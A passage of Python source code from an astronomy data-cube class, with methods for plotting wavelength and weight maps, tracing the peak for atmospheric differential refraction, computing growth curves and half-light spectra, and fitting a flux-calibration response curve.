# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def plot_weight(
        self, norm=colors.Normalize(), cmap="gist_gray", fig_size=10, save_file=""
    ):
        """
        Plot the weight map (mean of self._weight along the wavelength axis).

        Parameters
        ----------
        norm:
            Colour normalization, default colors.Normalize() (linear).
        cmap:
            Colour map used, default "gist_gray".
        fig_size:
            Size of the figure (in x-axis), default: fig_size=10
        save_file:
            (Optional) Save plot in file "file.extension"

        Example
        ----------
        >>> cube1s.plot_weight()
        """
        # Collapse the per-wavelength weights into a single 2D map and
        # delegate the drawing to plot_map.
        interpolated_map = np.mean(self._weight, axis=0)
        self.plot_map(
            interpolated_map,
            norm=norm,
            fig_size=fig_size,
            cmap=cmap,
            save_file=save_file,
            description=self.description + " - Weight map",
        )
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_wavelength(
self,
wavelength,
w2=0.0,
cmap=fuego_color_map,
fig_size=10,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
save_file="",
fcal=False,
):
"""
Plot map at a particular wavelength or in a wavelength range
Parameters
----------
wavelength: float
wavelength to be mapped.
norm:
Colour scale, default = colors.PowerNorm(gamma=1./4.)
Normalization scale
Lineal scale: norm=colors.Normalize().
Log scale:norm=colors.LogNorm()
cmap:
Color map used, default cmap=fuego_color_map
Velocities: cmap="seismic"
save_file:
(Optional) Save plot in file "file.extension"
"""
if w2 == 0.0:
interpolated_map = self.data[np.searchsorted(self.wavelength, wavelength)]
description = "{} - {} $\AA$".format(self.description, wavelength)
else:
interpolated_map = np.nansum(
self.data[
np.searchsorted(self.wavelength, wavelength): np.searchsorted(
self.wavelength, w2
)
],
axis=0,
)
description = "{} - Integrating [{}-{}] $\AA$".format(
self.description, wavelength, w2
)
self.plot_map(
mapa=interpolated_map,
norm=norm,
fig_size=fig_size,
cmap=cmap,
save_file=save_file,
description=description,
fcal=fcal,
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def plot_map(
        self,
        mapa="",
        norm=colors.Normalize(),
        cmap="fuego",
        fig_size=10,
        fcal=False,
        save_file="",
        description="",
        contours=True,
        clabel=False,
        spaxel=0,
        spaxel2=0,
        spaxel3=0,
    ):
        """
        Show a given map.

        Parameters
        ----------
        mapa: np.array(float)
            Map to be plotted. If not given, it plots the integrated map.
        norm:
            Normalization scale, default is lineal scale.
            Lineal scale: norm=colors.Normalize().
            Log scale: norm=colors.LogNorm()
            Power law: norm=colors.PowerNorm(gamma=1./4.)
        cmap: (default cmap="fuego").
            Color map used.
            Weight: cmap = "gist_gray"
            Velocities: cmap="seismic".
            Try also "inferno",
        fcal:
            Selects the colour-bar label (calibrated flux vs arbitrary units).
        save_file:
            (Optional) Save plot in file "file.extension"; if empty, nothing
            is shown or saved (plt.show() is commented out).
        contours, clabel:
            Overlay contours on the map, and label them.
        spaxel,spaxel2,spaxel3:
            [x,y] positions of spaxels to show with a green circle, blue square and red triangle
        """
        if description == "":
            description = self.description
        # NOTE(review): comparing mapa (possibly an ndarray) with "" relies on
        # NumPy returning a plain False for incomparable types; a None sentinel
        # would be cleaner — confirm callers before changing the default.
        if mapa == "":
            mapa = self.integrated_map
            description = description + " - Integrated Map"
        fig, ax = plt.subplots(figsize=(fig_size, fig_size))
        # extent centres the map on (0, 0) in arcsec offsets from cube centre.
        cax = ax.imshow(
            mapa,
            origin="lower",
            interpolation="none",
            norm=norm,
            cmap=cmap,
            extent=(
                -0.5 * self.n_cols * self.pixel_size_arcsec,
                0.5 * self.n_cols * self.pixel_size_arcsec,
                -0.5 * self.n_rows * self.pixel_size_arcsec,
                +0.5 * self.n_rows * self.pixel_size_arcsec,
            ),
        )
        if contours:
            CS = plt.contour(
                mapa,
                extent=(
                    -0.5 * self.n_cols * self.pixel_size_arcsec,
                    0.5 * self.n_cols * self.pixel_size_arcsec,
                    -0.5 * self.n_rows * self.pixel_size_arcsec,
                    +0.5 * self.n_rows * self.pixel_size_arcsec,
                ),
            )
            # clabel only makes sense when contours were drawn; CS is undefined
            # otherwise (clabel=True with contours=False would raise NameError).
            if clabel:
                plt.clabel(CS, inline=1, fontsize=10)
        ax.set_title(description, fontsize=14)
        plt.tick_params(labelsize=12)
        plt.xlabel("$\Delta$ RA [arcsec]", fontsize=12)
        plt.ylabel("$\Delta$ DEC [arcsec]", fontsize=12)
        plt.legend(loc="upper right", frameon=False)
        plt.minorticks_on()
        plt.grid(which="both", color="white")
        # plt.gca().invert_xaxis() #MAMA
        # Optional spaxel markers: each offset is computed relative to the
        # cube centre spaxel (spaxel_RA0/spaxel_DEC0) in arcsec.
        if spaxel != 0:
            print(" The center of the cube is in spaxel [ {} , {} ]".format(self.spaxel_RA0, self.spaxel_DEC0))
            plt.plot([0], [0], "+", ms=13, color="black", mew=4)
            plt.plot([0], [0], "+", ms=10, color="white", mew=2)
            offset_from_center_x_arcsec = (
                spaxel[0] - self.spaxel_RA0 + 1.5
            ) * self.pixel_size_arcsec
            offset_from_center_y_arcsec = (
                spaxel[1] - self.spaxel_DEC0 + 1.5
            ) * self.pixel_size_arcsec
            print(" - Green circle: {}, Offset from center [arcsec] : {} {}".format(spaxel, offset_from_center_x_arcsec, offset_from_center_y_arcsec))
            plt.plot(
                [offset_from_center_x_arcsec],
                [offset_from_center_y_arcsec],
                "o",
                color="green",
                ms=7,
            )
        if spaxel2 != 0:
            offset_from_center_x_arcsec = (
                spaxel2[0] - self.spaxel_RA0 + 1.5
            ) * self.pixel_size_arcsec
            offset_from_center_y_arcsec = (
                spaxel2[1] - self.spaxel_DEC0 + 1.5
            ) * self.pixel_size_arcsec
            print(" - Blue square: {} , Offset from center [arcsec] : {} , {}".format(np.round(spaxel2, 2), np.round(offset_from_center_x_arcsec, 3), np.round(offset_from_center_y_arcsec, 3)))
            plt.plot(
                [offset_from_center_x_arcsec],
                [offset_from_center_y_arcsec],
                "s",
                color="blue",
                ms=7,
            )
        if spaxel3 != 0:
            offset_from_center_x_arcsec = (
                spaxel3[0] - self.spaxel_RA0 + 1.5
            ) * self.pixel_size_arcsec
            offset_from_center_y_arcsec = (
                spaxel3[1] - self.spaxel_DEC0 + 1.5
            ) * self.pixel_size_arcsec
            print(" - Red triangle: {} , Offset from center [arcsec] : {} , {}".format(np.round(spaxel3, 2), np.round(offset_from_center_x_arcsec, 3), np.round(offset_from_center_y_arcsec, 3)))
            plt.plot(
                [offset_from_center_x_arcsec],
                [offset_from_center_y_arcsec],
                "v",
                color="red",
                ms=7,
            )
        cbar = fig.colorbar(cax, fraction=0.0457, pad=0.04)
        if fcal:
            barlabel = "{}".format("Integrated Flux [erg s$^{-1}$ cm$^{-2}$]")
        else:
            barlabel = "{}".format("Integrated Flux [Arbitrary units]")
        cbar.set_label(barlabel, rotation=270, labelpad=20, fontsize=14)
        # cbar.ax.set_yticklabels(['< -1', '0', '> 1'])# vertically oriented colorbar
        if save_file == "":
            #plt.show()
            pass
        else:
            plt.savefig(save_file)
        plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def create_map(self, wavelength1, wavelength2, name="NEW_MAP"):
"""
Create map adding maps in a wavelength range."
Parameters
----------
wavelength1, wavelength2: floats
The map will integrate all flux in the range [wavelength1, wavelength2].
map_name: string
String with the name of the map, must be the same than file created here.
Example
-------
>>> a = cube.create_map(6810,6830, "a")
> Created map with name a integrating range [ 6810 , 6830 ]
"""
mapa = np.nansum(
self.data[
np.searchsorted(self.wavelength, wavelength1): np.searchsorted(
self.wavelength, wavelength2
)
],
axis=0,
)
print("\n> Created map with name {} integrating range [ {} , {} ]".format(name, wavelength1, wavelength2))
print(" Data shape {}".format(np.shape(self.data)))
print(" Int map shape {}".format(np.shape(mapa)))
return mapa
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def trace_peak(
self, edgelow=10, edgehigh=10, plot=False, ADR=False, smoothfactor=2
): # TASK_trace_peak
"""
Parameters
----------
edgelow
edgehigh
plot
ADR
smoothfactor
Returns
-------
"""
print("\n\n> Tracing intensity peak over all wavelengths...")
x = np.arange(self.n_cols)
y = np.arange(self.n_rows)
if ADR:
print(" Checking ADR correction (small jumps are due to pixel size) ...")
tmp = copy.deepcopy(self.data_ADR)
tmp_img = np.nanmedian(tmp, axis=0)
sort = np.sort(tmp_img.ravel())
low_ind = np.where(tmp_img < sort[int(0.8 * len(sort))])
for i in np.arange(len(low_ind[0])):
tmp[:, low_ind[0][i], low_ind[1][i]] = np.nan
weight = np.nan_to_num(tmp) # self.data_ADR)
smoothfactor = 10
else:
tmp = copy.deepcopy(self.data)
tmp_img = np.nanmedian(tmp, axis=0)
sort = np.sort(tmp_img.ravel())
low_ind = np.where(tmp_img < sort[int(0.9 * len(sort))])
# print(low_ind.shape)
for i in np.arange(len(low_ind[0])):
tmp[:, low_ind[0][i], low_ind[1][i]] = np.nan
weight = np.nan_to_num(tmp) # self.data)
# try to median smooth image for better results?
# weight=sig.medfilt(weight,kernel_size=[51,1,1])
# also threshold the image so only the top 80% are used
mean_image = np.nanmean(weight, axis=0)
mean_image /= np.nanmean(mean_image)
weight *= mean_image[np.newaxis, :, :]
xw = x[np.newaxis, np.newaxis, :] * weight
yw = y[np.newaxis, :, np.newaxis] * weight
w = np.nansum(weight, axis=(1, 2))
self.x_peak = np.nansum(xw, axis=(1, 2))/w
self.y_peak = np.nansum(yw, axis=(1, 2))/w
self.x_peak_median = np.nanmedian(self.x_peak)
self.y_peak_median = np.nanmedian(self.y_peak)
self.x_peak_median_index = np.nanargmin(
np.abs(self.x_peak - self.x_peak_median)
)
self.y_peak_median_index = np.nanargmin(
np.abs(self.y_peak - self.y_peak_median)
)
wl = self.wavelength
x = (
self.x_peak - self.x_peak[self.x_peak_median_index]
) * self.pixel_size_arcsec
y = (
self.y_peak - self.y_peak[self.y_peak_median_index]
) * self.pixel_size_arcsec
odd_number = (
smoothfactor * int((np.sqrt(self.n_wave)/2)) + 1
) # Originarily, smoothfactor = 2
print(" Using medfilt window = {}".format(odd_number))
# fit, trimming edges
index = np.arange(len(x))
valid_ind = np.where(
(index >= edgelow)
& (index <= len(wl) - edgehigh)
& (~np.isnan(x))
& (~np.isnan(y))
)[0]
valid_wl = wl[valid_ind]
valid_x = x[valid_ind]
wlm = sig.medfilt(valid_wl, odd_number)
wx = sig.medfilt(valid_x, odd_number)
# iteratively clip and refit for WX
maxit = 10
niter = 0
stop = 0
fit_len = 100 # -100
while stop < 1:
# print ' Trying iteration ', niter,"..."
# a2x,a1x,a0x = np.polyfit(wlm, wx, 2)
fit_len_init = copy.deepcopy(fit_len)
if niter == 0:
fit_index = np.where(wx == wx)
fit_len = len(fit_index)
sigma_resid = 0.0
if niter > 0:
sigma_resid = median_absolute_deviation(resid)
fit_index = np.where(np.abs(resid) < 4 * sigma_resid)[0]
fit_len = len(fit_index)
try:
p = np.polyfit(wlm[fit_index], wx[fit_index], 2)
pp = np.poly1d(p)
fx = pp(wl)
fxm = pp(wlm)
resid = wx - fxm
# print " Iteration {:2} results in RA: sigma_residual = {:.6f}, fit_len = {:5} fit_len ={:5}".format(niter,sigma_resid,fit_len_init,fit_len)
except Exception:
print(" Skipping iteration {}".format(niter))
if (niter >= maxit) or (fit_len_init == fit_len):
if niter >= maxit:
print(" x: Max iterations, {:2}, reached!")
if fit_len_init == fit_len:
print(" x: All interval fitted in iteration {:2} ! ".format(niter))
stop = 2
niter = niter + 1
# valid_y = y[edgelow:len(wl)-edgehigh]
valid_ind = np.where(
(index >= edgelow)
& (index <= len(wl) - edgehigh)
& (~np.isnan(x))
& (~np.isnan(y))
)[0]
valid_y = y[valid_ind]
wy = sig.medfilt(valid_y, odd_number)
# iteratively clip and refit for WY
maxit = 10
niter = 0
stop = 0
fit_len = -100
while stop < 1:
fit_len_init = copy.deepcopy(fit_len)
if niter == 0:
fit_index = np.where(wy == wy)
fit_len = len(fit_index)
sigma_resid = 0.0
if niter > 0:
sigma_resid = median_absolute_deviation(resid)
fit_index = np.where(np.abs(resid) < 4 * sigma_resid)[0]
fit_len = len(fit_index)
try:
p = np.polyfit(wlm[fit_index], wy[fit_index], 2)
pp = np.poly1d(p)
fy = pp(wl)
fym = pp(wlm)
resid = wy - fym
# print " Iteration {:2} results in DEC: sigma_residual = {:.6f}, fit_len = {:5} fit_len ={:5}".format(niter,sigma_resid,fit_len_init,fit_len)
except Exception:
print(" Skipping iteration {}".format(niter))
if (niter >= maxit) or (fit_len_init == fit_len):
if niter >= maxit:
print(" y: Max iterations, {:2}, reached!")
if fit_len_init == fit_len:
print(" y: All interval fitted in iteration {:2} ! ".format(niter))
stop = 2
niter = niter + 1
self.ADR_x = fx
self.ADR_y = fy
self.ADR_x_max = np.nanmax(self.ADR_x) - np.nanmin(self.ADR_x)
self.ADR_y_max = np.nanmax(self.ADR_y) - np.nanmin(self.ADR_y)
ADR_xy = np.sqrt(self.ADR_x ** 2 + self.ADR_y ** 2)
self.ADR_total = np.nanmax(ADR_xy) - np.nanmin(ADR_xy)
if plot:
plt.figure(figsize=(10, 5))
plt.plot(wl, fx, "-g", linewidth=3.5)
plt.plot(wl, fy, "-g", linewidth=3.5)
plt.plot(wl, x, "k.", alpha=0.2)
plt.plot(wl, y, "r.", alpha=0.2)
plt.plot(wl, sig.medfilt(x, odd_number), "k-")
plt.plot(wl, sig.medfilt(y, odd_number), "r-")
hi = np.max([np.nanpercentile(x, 95), np.nanpercentile(y, 95)])
lo = np.min([np.nanpercentile(x, 5), np.nanpercentile(y, 5)])
plt.ylim(lo, hi)
plt.ylabel("$\Delta$ offset [arcsec]")
plt.xlabel("Wavelength [$\AA$]")
plt.title(self.description)
# plt.show()
# plt.close()
print("> Peak coordinates tracing all wavelengths found in spaxel: ({:.2f}, {:.2f})".format(
self.x_peak_median, self.y_peak_median
))
print(" Effect of the ADR : {:.2f} in RA (black), {:.2f} in DEC (red), TOTAL = +/- {:.2f} arcsec".format(
self.ADR_x_max, self.ADR_y_max, self.ADR_total
))
# Check numbers using SMOOTH data
ADR_x_max = np.nanmax(fxm) - np.nanmin(fxm)
ADR_y_max = np.nanmax(fym) - np.nanmin(fym)
ADR_xy = np.sqrt(fxm ** 2 + fym ** 2)
ADR_total = np.nanmax(ADR_xy) - np.nanmin(ADR_xy)
print(" Using SMOOTH values: ")
print(" Effect of the ADR : {:.2f} in RA (black), {:.2f} in DEC (red), TOTAL = +/- {:.2f} arcsec".format(
ADR_x_max, ADR_y_max, ADR_total
))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def growth_curve_between(self, min_wave=0, max_wave=0, plot=False, verbose=False):
"""
Compute growth curve in a wavelength range.
Returns r2_growth_curve, F_growth_curve, flux, r2_half_light
Parameters
----------
min_wave, max_wave: floats
wavelength range = [min_wave, max_wave].
plot: boolean
Plot yes/no
Example
-------
>>>r2_growth_curve, F_growth_curve, flux, r2_half_light = self.growth_curve_between(min_wave, max_wave, plot=True) # 0,1E30 ??
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
if verbose:
print(" - Calculating growth curve between {} {} :".format(min_wave, max_wave))
index_min = np.searchsorted(self.wavelength, min_wave)
index_max = np.searchsorted(self.wavelength, max_wave)
intensity = np.nanmean(self.data[index_min:index_max, :, :], axis=0)
x_peak = np.median(self.x_peak[index_min:index_max])
y_peak = np.median(self.y_peak[index_min:index_max])
x = np.arange(self.n_cols) - x_peak
y = np.arange(self.n_rows) - y_peak
r2 = np.sum(np.meshgrid(x ** 2, y ** 2), axis=0)
sorted_by_distance = np.argsort(r2, axis=None)
F_growth_curve = []
r2_growth_curve = []
total_flux = 0.0
for spaxel in sorted_by_distance:
index = np.unravel_index(spaxel, (self.n_rows, self.n_cols))
I = intensity[index]
# print spaxel, r2[index], L, total_flux, np.isnan(L)
# if np.isnan(L) == False and L > 0:
if np.isnan(I) == False:
total_flux += I # TODO: Properly account for solid angle...
F_growth_curve.append(total_flux)
r2_growth_curve.append(r2[index])
F_guess = np.max(F_growth_curve)
r2_half_light = np.interp(0.5 * F_guess, F_growth_curve, r2_growth_curve)
self.seeing = np.sqrt(r2_half_light) * self.pixel_size_arcsec
if plot:
r_norm = np.sqrt(np.array(r2_growth_curve)/r2_half_light)
F_norm = np.array(F_growth_curve)/F_guess
print(" Flux guess = {} {} ratio = {}".format(F_guess, np.nansum(intensity), np.nansum(intensity)/F_guess))
print(" Half-light radius: {} arcsec = seeing if object is a star ".format(self.seeing))
print(" Light within 2, 3, 4, 5 half-light radii: {}".format(np.interp([2, 3, 4, 5], r_norm, F_norm)))
plt.figure(figsize=(10, 8))
plt.plot(r_norm, F_norm, "-")
plt.title(
"Growth curve between {} and {} in {}".format(min_wave, max_wave, self.object))
plt.xlabel("Radius [arcsec]")
plt.ylabel("Flux")
plt.axvline(x=self.seeing, color="g", alpha=0.7)
plt.axhline(y=0.5, color="k", linestyle=":", alpha=0.5)
plt.axvline(x=2 * self.seeing, color="k", linestyle=":", alpha=0.2)
plt.axvline(x=3 * self.seeing, color="k", linestyle=":", alpha=0.2)
plt.axvline(x=4 * self.seeing, color="k", linestyle=":", alpha=0.2)
plt.axvline(x=5 * self.seeing, color="r", linestyle="--", alpha=0.2)
# plt.axhline(y=np.interp([2, 3, 4], r_norm, F_norm), color='k', linestyle=':', alpha=0.2)
plt.axhline(
y=np.interp([6], r_norm, F_norm), color="r", linestyle="--", alpha=0.2
)
plt.minorticks_on()
# plt.show()
# plt.close()
return r2_growth_curve, F_growth_curve, F_guess, r2_half_light
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def half_light_spectrum(
        self, r_max=1, plot=False, smooth=21, min_wave=0, max_wave=0
    ):
        """
        Compute half light spectrum (for r_max=1) or integrated star spectrum (for r_max=5) in a wavelength range.

        At every wavelength, the flux of all spaxels within
        r_max * r_half_light of the (smoothed) traced peak is summed.

        Parameters
        ----------
        r_max = 1: float
            r_max to integrate, in units of r2_half_light (= seeing if object is a star, for flux calibration make r_max=5)
        min_wave, max_wave: floats
            wavelength range = [min_wave, max_wave]; 0 (default) means
            self.valid_wave_min / self.valid_wave_max.
        smooth = 21: float
            smooth the data (medfilt window for the peak traces and the
            plotted spectrum)
        plot: boolean
            Plot yes/no

        Returns
        -------
        np.array with the integrated spectrum (also stored in
        self.integrated_star_flux when r_max == 5).

        Example
        -------
        >>> self.half_light_spectrum(5, plot=plot, min_wave=min_wave, max_wave=max_wave)
        """
        if min_wave == 0:
            min_wave = self.valid_wave_min
        if max_wave == 0:
            max_wave = self.valid_wave_max
        # NOTE(review): plot=True / verbose=True are hard-coded here, ignoring
        # this method's own `plot` argument — confirm whether intentional.
        (
            r2_growth_curve,
            F_growth_curve,
            flux,
            r2_half_light,
        ) = self.growth_curve_between(
            min_wave, max_wave, plot=True, verbose=True
        )  # 0,1E30 ??
        # print "\n> Computing growth-curve spectrum..."
        intensity = []
        # Smooth the traced peak positions so the aperture centre is stable.
        smooth_x = sig.medfilt(self.x_peak, smooth)  # originally, smooth = 11
        smooth_y = sig.medfilt(self.y_peak, smooth)
        edgelow = (np.abs(self.wavelength - min_wave)).argmin()
        edgehigh = (np.abs(self.wavelength - max_wave)).argmin()
        valid_wl = self.wavelength[edgelow:edgehigh]
        for l in range(self.n_wave):  # self.n_wave
            # wavelength = self.wavelength[l]
            # if l % (self.n_wave/10+1) == 0:
            # print "  {:.2f} Angstroms (wavelength {}/{})..." \
            # .format(wavelength, l+1, self.n_wave)
            x = np.arange(self.n_cols) - smooth_x[l]
            y = np.arange(self.n_rows) - smooth_y[l]
            r2 = np.sum(np.meshgrid(x ** 2, y ** 2), axis=0)
            # Sum the flux of every spaxel within r_max half-light radii.
            spaxels = np.where(r2 < r2_half_light * r_max ** 2)
            intensity.append(np.nansum(self.data[l][spaxels]))
        valid_intensity = intensity[edgelow:edgehigh]
        valid_wl_smooth = sig.medfilt(valid_wl, smooth)
        valid_intensity_smooth = sig.medfilt(valid_intensity, smooth)
        if plot:
            fig_size = 12
            plt.figure(figsize=(fig_size, fig_size / 2.5))
            plt.plot(self.wavelength, intensity, "b", alpha=1, label="Intensity")
            plt.plot(
                valid_wl_smooth,
                valid_intensity_smooth,
                "r-",
                alpha=0.5,
                label="Smooth = " + "{}".format(smooth),
            )
            margen = 0.1 * (np.nanmax(intensity) - np.nanmin(intensity))
            plt.ylim(np.nanmin(intensity) - margen, np.nanmax(intensity) + margen)
            plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
            plt.ylabel("Flux")
            plt.xlabel("Wavelength [$\AA$]")
            plt.title("Integrated spectrum of {} for r_half_light = {}".format(self.object, r_max))
            plt.axvline(x=min_wave, color="k", linestyle="--", alpha=0.5)
            plt.axvline(x=max_wave, color="k", linestyle="--", alpha=0.5)
            plt.minorticks_on()
            plt.legend(frameon=False, loc=1)
            # plt.show()
            # plt.close()
        if r_max == 5:
            print(" Saving this integrated star flux in self.integrated_star_flux")
            self.integrated_star_flux = np.array(intensity)
        return np.array(intensity)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def do_response_curve(
self,
filename,
min_wave=0,
max_wave=0,
step=25.0,
fit_degree=3,
exp_time=60,
smooth=0.03,
ha_width=0,
plot=True,
verbose=False,
): # smooth new 5 Mar, smooth=21, now we don't use it
"""
Compute the response curve of a spectrophotometric star.
Parameters
----------
filename: string
filename where the spectrophotometric data are included (e.g. ffeige56.dat)
min_wave, max_wave: floats
wavelength range = [min_wave, max_wave] where the fit is performed
step = 25: float
Step (in A) for smoothing the data
fit_degree = 3: integer
degree of the polynomium used for the fit (3, 5, or 7).
If fit_degree = 0 it interpolates the data
exp_time = 60: float
Exposition time of the calibration star
smooth = 0.03: float
Smooth value for interpolating the data for fit_degree = 0.
plot: boolean
Plot yes/no
Example
-------
>>> babbsdsad
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
print("\n> Computing response curve for {} using step= {}, in range [ {} , {} ]".format(self.object, step, min_wave, max_wave))
# flux_cal_read in units of ergs/cm/cm/s/A * 10**16
# lambda_cal_read, flux_cal_read, delta_lambda_read = np.loadtxt(filename, usecols=(0,1,3), unpack=True)
lambda_cal_read, flux_cal_read = np.loadtxt(
filename, usecols=(0, 1), unpack=True
)
valid_wl_smooth = np.arange(lambda_cal_read[0], lambda_cal_read[-1], step)
tck_star = interpolate.splrep(lambda_cal_read, flux_cal_read, s=0)
valid_flux_smooth = interpolate.splev(valid_wl_smooth, tck_star, der=0)
valid_wave_min = min_wave
valid_wave_max = max_wave
edgelow = (np.abs(valid_wl_smooth - valid_wave_min)).argmin()
edgehigh = (np.abs(valid_wl_smooth - valid_wave_max)).argmin()
lambda_cal = valid_wl_smooth[edgelow:edgehigh]
flux_cal = valid_flux_smooth[edgelow:edgehigh]
lambda_min = lambda_cal - step
lambda_max = lambda_cal + step
if (
self.flux_cal_step == step
and self.flux_cal_min_wave == min_wave
and self.flux_cal_max_wave == max_wave
):
print(" This has been computed before for step= {} in range [ {} , {} ], using values computed before...".format(step, min_wave, max_wave))
measured_counts = self.flux_cal_measured_counts
else:
measured_counts = np.array(
[
self.fit_Moffat_between(lambda_min[i], lambda_max[i])[0]
if lambda_cal[i] > min_wave
and lambda_cal[i] < max_wave # 6200 #3650 # 7400 #5700
else np.NaN
for i in range(len(lambda_cal))
]
)
self.flux_cal_step = step
self.flux_cal_min_wave = min_wave
self.flux_cal_max_wave = max_wave
self.flux_cal_measured_counts = measured_counts
_response_curve_ = (
old_div(old_div(measured_counts, flux_cal), exp_time) # TODO, function is not called. fix once called
) # Added exp_time Jan 2019 counts / (ergs/cm/cm/s/A * 10**16) / s = counts * ergs*cm*cm*A / 10**16
if np.isnan(_response_curve_[0]) == True:
_response_curve_[0] = _response_curve_[
1
] # - (response_curve[2] - response_curve[1])
scale = np.nanmedian(_response_curve_)
# self.integrated_star_flux = self.half_light_spectrum(5, plot=plot, min_wave=min_wave, max_wave=max_wave)
edgelow_ = (np.abs(self.wavelength - lambda_cal[0])).argmin()
edgehigh_ = (np.abs(self.wavelength - lambda_cal[-1])).argmin()
self.response_wavelength = self.wavelength[edgelow_:edgehigh_]
response_wavelength = []
response_curve = []
if ha_width > 0:
skipping = 0
print(" Skipping H-alpha absorption with width ={} A ...".format(ha_width))
for i in range(len(lambda_cal)):
if (
lambda_cal[i] > 6563 - ha_width / 2.0
and lambda_cal[i] < 6563 + ha_width / 2.0
):
# print " Skipping ",lambda_cal[i]
skipping = skipping + 1
else:
response_wavelength.append(lambda_cal[i])
response_curve.append(_response_curve_[i])
print(" ... Skipping a total of {} wavelength points".format(skipping))
else:
response_wavelength = lambda_cal
response_curve = _response_curve_
if fit_degree == 0:
print(" Using interpolated data with smooth = {} for computing the response curve... ".format(smooth))
median_kernel = 151
response_curve_medfilt = sig.medfilt(response_curve, np.int(median_kernel))
interpolated_flat = interpolate.splrep(
response_wavelength, response_curve_medfilt, s=smooth
)
self.response_curve = interpolate.splev(
self.response_wavelength, interpolated_flat, der=0
)
else:
if fit_degree != 9:
if fit_degree != 7:
if fit_degree != 5:
if fit_degree != 3:
print(" We can't use a polynomium of grade here, using fit_degree = 3 instead".format(fit_degree))
fit_degree = 3
if fit_degree == 3:
a3x, a2x, a1x, a0x = np.polyfit(response_wavelength, response_curve, 3)
a4x = 0
a5x = 0
a6x = 0
a7x = 0
a8x = 0
a9x = 0
if fit_degree == 5:
a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
response_wavelength, response_curve, 5
)
a6x = 0
a7x = 0
a8x = 0
a9x = 0
if fit_degree == 7:
a7x, a6x, a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
response_wavelength, response_curve, 7
)
a8x = 0
a9x = 0
if fit_degree == 9:
a9x, a8x, a7x, a6x, a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
response_wavelength, response_curve, 9
)
wlm = self.response_wavelength
self.response_curve = (
a0x
+ a1x * wlm
+ a2x * wlm ** 2
+ a3x * wlm ** 3
+ a4x * wlm ** 4
+ a5x * wlm ** 5
+ a6x * wlm ** 6
+ a7x * wlm ** 7
+ a8x * wlm ** 8
+ a9x * wlm ** 9
) # Better use next
# Adapting Matt code for trace peak ----------------------------------
smoothfactor = 2
wl = response_wavelength # response_wavelength
x = response_curve
odd_number = (
smoothfactor * int((np.sqrt(len(wl))/2)) - 1
) # Originarily, smoothfactor = 2
print(" Using medfilt window = {} for fitting...".format(odd_number))
# fit, trimming edges
# index=np.arange(len(x))
# edgelow=0
# edgehigh=1
# valid_ind=np.where((index >= edgelow) & (index <= len(wl)-edgehigh) & (~np.isnan(x)) )[0]
# print valid_ind
# valid_wl = wl[edgelow:-edgehigh] # wl[valid_ind]
# valid_x = x[edgelow:-edgehigh] #x[valid_ind]
# wlm = sig.medfilt(valid_wl, odd_number)
# wx = sig.medfilt(valid_x, odd_number)
wlm = sig.medfilt(wl, odd_number)
wx = sig.medfilt(x, odd_number)
# iteratively clip and refit for WX
maxit = 10
niter = 0
stop = 0
fit_len = 100 # -100
while stop < 1:
# print ' Trying iteration ', niter,"..."
# a2x,a1x,a0x = np.polyfit(wlm, wx, 2)
fit_len_init = copy.deepcopy(fit_len)
if niter == 0:
fit_index = np.where(wx == wx)
fit_len = len(fit_index)
sigma_resid = 0.0
if niter > 0:
sigma_resid = median_absolute_deviation(resid)
fit_index = np.where(np.abs(resid) < 4 * sigma_resid)[0]
fit_len = len(fit_index)
try:
p = np.polyfit(wlm[fit_index], wx[fit_index], fit_degree)
pp = np.poly1d(p)
fx = pp(wl)
fxm = pp(wlm)
resid = wx - fxm
# print " Iteration {:2} results in RA: sigma_residual = {:.6f}, fit_len = {:5} fit_len ={:5}".format(niter,sigma_resid,fit_len_init,fit_len)
except Exception:
print(" Skipping iteration {}".format(niter))
if (niter >= maxit) or (fit_len_init == fit_len):
if niter >= maxit:
print(" Max iterations, {:2}, reached!")
if fit_len_init == fit_len:
print(" All interval fitted in iteration {:2} ! ".format(niter))
stop = 2
niter = niter + 1
# --------------------------------------------------------------------
if plot:
plt.figure(figsize=(10, 8))
plt.plot(
lambda_cal,
old_div(measured_counts, exp_time), # TODO, function is not called. fix once called
"g+",
ms=10,
mew=3,
label="measured counts",
)
plt.plot(lambda_cal, flux_cal * scale, "k*-", label="flux_cal * scale")
plt.plot(
lambda_cal,
flux_cal * _response_curve_,
"c:",
label="flux_cal * response",
)
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.title("Response curve for absolute flux calibration using {}".format(self.object))
plt.legend(frameon=False, loc=1)
plt.grid(which="both")
plt.axvline(x=min_wave, color="k", linestyle="--", alpha=0.5)
plt.axvline(x=max_wave, color="k", linestyle="--", alpha=0.5)
plt.minorticks_on()
# plt.show()
# plt.close()
plt.figure(figsize=(10, 8))
if fit_degree > 0:
text = "Fit using polynomium of degree {}".format(fit_degree)
else:
text = "Using interpolated data with smooth = {}".format(smooth)
plt.plot(
self.response_wavelength,
self.response_curve,
"r-",
alpha=0.4,
linewidth=4,
label=text,
)
plt.plot(lambda_cal, _response_curve_, "k--", alpha=0.8)
plt.plot(
response_wavelength,
response_curve,
"g-",
alpha=0.8,
label="Response curve",
)
plt.plot(
wl, fx, "b-", linewidth=6, alpha=0.5, label="Response curve (filtered)"
)
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.title("Response curve for absolute flux calibration using {}".format(self.object))
plt.minorticks_on()
plt.grid(which="both")
plt.axvline(x=min_wave, color="k", linestyle="--", alpha=0.5)
plt.axvline(x=max_wave, color="k", linestyle="--", alpha=0.5)
